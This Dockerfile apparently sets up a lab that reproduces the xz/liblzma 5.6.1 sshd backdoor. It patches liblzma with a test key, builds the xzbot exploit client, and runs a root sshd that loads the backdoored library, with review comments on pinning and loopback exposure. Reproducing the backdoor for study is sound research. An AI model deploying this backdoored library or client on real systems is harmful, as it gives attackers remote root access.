# Base image of each stage. These are pinned by tag, not by digest, so the
# registry can still move a tag to different content between builds.
ARG BUILD_IMAGE=alpine:3.19.1
ARG PATCH_IMAGE=python:3.12.2-slim-bookworm
ARG CLIENT_IMAGE=golang:1.22.1-alpine3.19
ARG FINAL_IMAGE=debian:12.5-slim

# The xz backdoor only works on x86_64, so both the OS and the architecture
# are hardcoded here.
# NOTE(review): PLATFORM is composed below, but none of the FROM lines in this
# file passes it via --platform -- confirm whether the build relies on the
# host already being linux/amd64.
ARG PLATFORM_OS=linux
ARG PLATFORM_ARCH=amd64
ARG PLATFORM=${PLATFORM_OS}/${PLATFORM_ARCH}
ARG PLATFORM_CPU_ARCH=x86_64

# xz/liblzma version, and the shared-object / Debian package file names
# derived from it.
ARG XZ_VERSION=5.6.1
ARG XZ_SO=liblzma.so
ARG XZ_LIB=${XZ_SO}.${XZ_VERSION}
ARG XZ_DEB=liblzma5_${XZ_VERSION}_${PLATFORM_ARCH}.deb

# xzbot revision to check out.
# Everything above precedes the first FROM: a stage only sees one of these
# values after redeclaring it with a bare `ARG NAME`.
ARG XZ_BOT_REV=0cabe4c
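#
# BUILD: Clone the xzbot repo and check out the pinned revision.
#
FROM $BUILD_IMAGE AS build
# An ARG declared before the first FROM is not visible inside a stage until it
# is redeclared. Without this line $XZ_BOT_REV expands to nothing, `git checkout`
# runs with no argument and succeeds as a no-op, and every later stage is built
# from whatever the default branch holds at build time.
ARG XZ_BOT_REV
WORKDIR /build
# The revision is quoted so that an empty value fails the build instead of
# silently skipping the pin.
# NOTE(review): XZ_BOT_REV is an abbreviated hash; the full 40-character commit
# id is the stronger pin.
RUN apk add --no-cache git \
    && git clone https://github.com/amlweems/xzbot.git . \
    && git checkout "$XZ_BOT_REV"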
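#
# BUILD-PATCH: Patch liblzma with ED448 public key (seed 0).
#
FROM $PATCH_IMAGE AS build-patch
ARG PLATFORM_OS
ARG XZ_LIB
WORKDIR /build
# patch.py and the liblzma asset both come from the xzbot checkout made in the
# build stage; the final stage later copies /build/$XZ_LIB.patch out of here.
COPY --from=build /build/patch.py /build/assets/$XZ_LIB ./
# ARCH is read from the build container itself (uname -m with '_' turned into
# '-') and selects the binutils package.
# NOTE(review): that follows the host architecture, while PLATFORM_CPU_ARCH is
# fixed to x86_64 at the top of the file -- confirm this is intended for
# non-x86_64 build hosts.
# NOTE(review): pwntools is installed unpinned, so the code that rewrites the
# library can change between builds; pin the version once one has been
# validated against patch.py.
RUN ARCH=$(uname -m | tr '_' '-'); \
    apt-get update && apt-get install -y --no-install-recommends --no-install-suggests \
        "binutils-$ARCH-$PLATFORM_OS-gnu" \
        cpp \
    && pip install --no-cache-dir pwntools \
    && python3 patch.py "$XZ_LIB"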
#
# BUILD-CLIENT: Compile xzbot (the ssh client) from the cloned sources.
#
FROM ${CLIENT_IMAGE} AS build-ssh-client
WORKDIR /build
ARG PLATFORM_ARCH
ARG PLATFORM_OS
# Only the Go module files and main.go are taken from the build stage.
COPY --from=build /build/go.* /build/main.go ./
# cgo is disabled and the target OS/architecture come from the global ARGs.
RUN CGO_ENABLED=0 GOOS="${PLATFORM_OS}" GOARCH="${PLATFORM_ARCH}" go build
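#
# FINAL: Build final image containing patched liblzma and xzbot.
#
FROM $FINAL_IMAGE AS final
ARG XZ_LIB
ARG XZ_DEB
ARG PLATFORM_CPU_ARCH
ARG PLATFORM_OS
# ENV DEBIAN_FRONTEND=noninteractive
WORKDIR /build
# NOTE(review): the .deb is taken from the build context and installed without
# an integrity check; record its SHA-256 next to the file and verify it before
# `dpkg -i` so a swapped package is caught at build time.
COPY debs/$XZ_DEB ./
COPY --from=build-patch /build/$XZ_LIB.patch ./
COPY --from=build-ssh-client /build/xzbot ./
RUN apt-get update && apt-get install -y --no-install-recommends --no-install-suggests \
        openssh-server \
    && rm -rf /var/lib/apt/lists/*
# Install the vulnerable version of liblzma, then overwrite its shared object
# with the patched build. The grep fails the build if the sed pattern did not
# match, instead of leaving sshd on its default port unnoticed.
RUN dpkg -i "./$XZ_DEB" \
    && cp "$XZ_LIB.patch" "/lib/$PLATFORM_CPU_ARCH-$PLATFORM_OS-gnu/$XZ_LIB" \
    && sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config \
    && grep -q '^Port 2222' /etc/ssh/sshd_config \
    && mkdir -p /var/run/sshd
# sshd listens on 2222 (set above) and runs as root with the patched liblzma
# loaded; when the container is started, publish the port bound to loopback
# (for example -p 127.0.0.1:2222:2222) rather than on a routable interface.
# sshd is started with every environment variable cleared except LANG; per the
# original author, that is what lets the exploit work without systemd.
CMD ["env", "-i", "LANG=en_US.UTF-8", "/usr/sbin/sshd", "-D"]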